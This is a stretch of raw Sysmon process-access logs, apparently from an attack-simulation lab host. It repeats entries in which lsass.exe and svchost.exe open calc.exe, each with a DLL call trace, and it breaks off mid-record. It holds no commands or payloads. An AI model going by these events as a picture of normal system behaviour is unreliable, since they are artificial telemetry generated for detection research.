22:12:48.171{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360643Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360642Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360641Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360640Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360639Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360638Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360637Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360636Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360635Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360634Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360633Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360632Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360631Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360630Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360629Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.171{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360628Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360627Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360626Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360625Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360624Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360623Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360622Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 